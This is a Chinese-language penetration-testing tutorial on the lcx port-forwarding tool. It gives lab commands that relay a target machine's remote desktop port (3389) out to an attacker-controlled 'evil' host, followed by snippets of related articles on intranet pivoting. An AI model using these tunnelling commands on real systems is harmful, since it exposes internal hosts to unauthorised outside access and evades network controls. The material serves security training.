隐藏隧道通信:lcx 端口转发

article/2025/8/24 5:36:34

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

隐藏隧道通信:lcx 端口转发

  • 1 lcx 端口转发原理
  • 2 实验环境
  • 3 配置服务端
  • 4 配置客户端

1 lcx 端口转发原理

lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。

一个基本的 Socket 隧道必须包含两端:

  1. 服务端:监听一个端口,等待客户端连接
  2. 客户端:通过传入服务端的 IP 地址和端口,与服务端建立连接。
lcx.exe -h
[Usage of Packet Transmit:]lcx.exe -<listen|tran|slave> <option> [-log logfile][option:]-listen <ConnectPort> <TransmitPort>-tran   <ConnectPort> <TransmitHost> <TransmitPort> # 经测试无法过 nat 有点鸡肋。-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

2 实验环境

image-20211017115422798

3 配置服务端

  • 在 evil 主机上,将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上
lcx.exe -listen 4444 13389

image-20211017122154543

4 配置客户端

  • 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是 192.168.0.21
  • 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。
  1. 配置 LCX 端口转发

    .\lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389
    

    image-20211017122052060

  2. 客户端与服务端建立通信连接

    image-20211017122723399

  3. 与远程主机建立远程桌面连接

    • 客户端:

      image-20211017123500180

    • 服务端:

      image-20211017123025944

  4. 抓包查看流量特征

    image-20211017123245902


http://chatgpt.dhexx.cn/article/xeJ82XaP.shtml

相关文章

lcx端口转发linux_技术干货 | 内网渗透之代理转发

1 前言 谈到内网转发&#xff0c;在我们日常的渗透测试过程中经常会用到端口转发&#xff0c;可以利用代理脚本将内网的流量代理到本地进行访问&#xff0c;这样极大的方便了我们对内网进行横向渗透。 那为什么不直接通过登陆服务器来对内网中其他机器进行渗透&#xff0c;而是…

lcx用法

lcx.exe是一个端口转发工具&#xff0c;有Windows版和Linux版两个版本&#xff0c;Windows版是lcx.exe,Linux版为portmap Windows版使用方法如下&#xff1a; lcx有两大功能&#xff1a; 1&#xff09;端口转发(listen和slave成对使用) 2&#xff09;端口映射(tran) 1、lcx 内网…

lcx端口转发

lcx端口转发&#xff1a; 本文主要通过讲解lcx的本地端口及远程端口转发&#xff0c;让能熟练使用lcx端口转发工具&#xff0c;对端口转发知识有更加深入了解&#xff0c;本次实验靶场来源于暗月(moonsec)师傅,本文内容全由本人通过学习理解编制&#xff0c;文中若有错处&…

LCX端⼝转发

LCX是一款十分经典的内网端口转发工具&#xff0c;基于Socket套接字&#xff0c;具有端口转发和端口映射的功能。但是目前很多杀软已经将其加入了特征库&#xff0c;在实际利用的时候需要自行做免杀处理。 lcx有三个功能&#xff1a; 第一个功能将本地端口转发到本地另一个端口…

网络安全——lcx的使用

lcx程序可以作远程连接&#xff0c;入侵靶机 下面用win7系统和2003系统作对象 1、 Win7系统作攻击机&#xff08;IP&#xff1a;192.168.184.134&#xff09; 2003系统作靶机&#xff08;被攻击的对象&#xff09;&#xff08;IP&#xff1a;192.168.184.101&#xff09; …

lcx使用方法

lcx实现端口转发 概念 比较经典的就是lcx。简单说一下概念&#xff0c;首先内网中的主机一般都是使用的私有ip&#xff0c;在网络出口处经过NAT转换为公网ip后&#xff0c;才能访问internet。 所以&#xff0c;有时当我们进入网站后台cmd&#xff0c;或者捕获了一台内网中的肉…

端口转发之 lcx

lcx.exe是一个端口转发工具&#xff0c;有Windows版和Linux版两个版本&#xff0c;Windows版是lcx.exe,Linux版为portmap Windows版使用方法如下&#xff1a; lcx有两大功能&#xff1a; 1&#xff09;端口转发(listen和slave成对使用) 2&#xff09;端口映射(tran) 1、lcx 内网…

远程桌面连接:使用lcx进行端口转发

一、lcx介绍 lcx是一个基于Socket套接字实现的端口转发工具&#xff0c;有Linux和Windows两个版本。比如说&#xff0c;当目标机器开放了3389端口&#xff0c;我们可以将目标机器的3389端口转发到我们自己的外网主机上的某个端口&#xff0c;然后我们在本地机访问外网主机的端…

从服务器下载文件到本地

今天在公司服务器下了一个很大的数据文件&#xff08;8G)&#xff0c;想拉到本地。 环境 本地是Windows&#xff0c;服务器Linux。笔记本刚格式化了&#xff0c;所以碰到了一些之前没有的问题。 过程 1.首先尝试直接winR&#xff0c;输入cmd回车&#xff0c;打开命令行&…

从服务器中下载文件

从服务器中下载文件 本篇博客主要是实现从云服务器中的Linux系统中通过指令下载文件&#xff0c;其具体如下 1、tar -cvzf 压缩包名.tar.gz 文件或文件夹 1.1 指令解释 tar 对多个文件或文件夹进行打包/解包&#xff0c;并且可以进行压缩/解压缩-c 打包&#xff1b; -x 解…

linux上传下载文件

上传下载文件 背景&#xff1a; 通常&#xff0c;我们需要上传本地文件到服务器&#xff0c;或者从服务器下载文件到本地。 一般来说&#xff0c;方法多种多样。我们可以通过SCRT提供的一个辅助工具来进行 下载辅助工具 yum -y install lrzsz命令行 sz # 从服务器下载某文件到…

文件 - 04 下载文件: 根据文件下载链接下载文件

文章目录 1. 根据下载链接下载文件2. 根据下载链接下载文件1. 根据token获取存放在redis中的fileId2. 根据fileId获得文件信息3. 确定用户拥有操作这个fileId的权限4. 获取文件在服务器的存储路径5. 如果用户指定了下载时的文件名则处理文件名6. 验证文件路径是否存在7. 下载文…

文件上传、下载

在Web应用系统开发中&#xff0c;文件上传和下载功能是非常常用的功能&#xff0c;今天来讲一下JavaWeb中的文件上传和下载功能的实现。 对于文件上传&#xff0c;浏览器在上传的过程中是将文件以流的形式提交到服务器端的&#xff0c;如果直接使用Servlet获取上传文件的输入流…

文件下载相关

下载文件的时候&#xff0c;返回报文里缺失响应码&#xff0c;原因&#xff1a;报文头在报文体前面&#xff0c;报文体一旦确定&#xff0c;响应头信息就不能被修改或添加了&#xff0c;但是如果文件流字节数小于等于8192*2的话&#xff0c;文件流内容会被默认加载在缓存中&…

Linux 如何从网上下载文件

镜像下载、域名解析、时间同步请点击 阿里云开源镜像站 将网络上的文件下载到使用 Linux 操作系统的计算机上&#xff0c;需要用到 wget 指令&#xff0c;使用该指令可能会面临两个问题。 首先&#xff0c;如何获取文件的下载 url&#xff1f;这需要你在浏览器上找到要下载文…

github怎么下载文件

在浏览器上打开github主站&#xff0c;点击搜索框。输入关键字搜索自己需要的代码文件&#xff0c;搜索到后点击打开文件库的主分支。 点击右边的code按钮。点击下拉菜单的下载按钮就可以下载文件了。

前端下载文件的几种方式

一、a标签download下载 后端返回一个可下载的url文件&#xff0c;或者前端本地保存的文件&#xff0c;通过路径引入下载。 &#xff08;1&#xff09;将资源放入前端本地保存&#xff0c;打包后随一起上传自服务器 // 本地资源下载&#xff0c;引入路径即可,这里的路径指的是…

这里有11种方法,供你用Python下载文件

今天我们一起学习如何使用不同的Python模块从web下载文件。此外&#xff0c;你将下载常规文件、web页面、Amazon S3和其他资源。 最后&#xff0c;你将学习如何克服可能遇到的各种挑战&#xff0c;例如下载重定向的文件、下载大型文件、完成一个多线程下载以及其他策略。 1、使…

15种下载文件的方法

转载&#xff1a;https://blog.netspi.com/15-ways-to-download-a-file/ 瑞恩甘德鲁德 原创时间&#xff1a;2014年6月16日 Pentesters经常将文件上传到受感染的盒子以帮助进行权限提升&#xff0c;或者保持在计算机上的存在。本博客将介绍将文件从您的计算机移动到受感染系统的…

【基础知识】---概率密度函数和似然函数的区别

这个是quora上的一个回答 What is the difference between probability and likelihood? 在评论中这位老师将概率密度函数和似然函数之间的关系&#xff0c;类比成 2b 和 a2 之间的关系。详细翻译如下&#xff1a; 2我们可以做一个类比&#xff0c;假设一个函数为 ab&#x…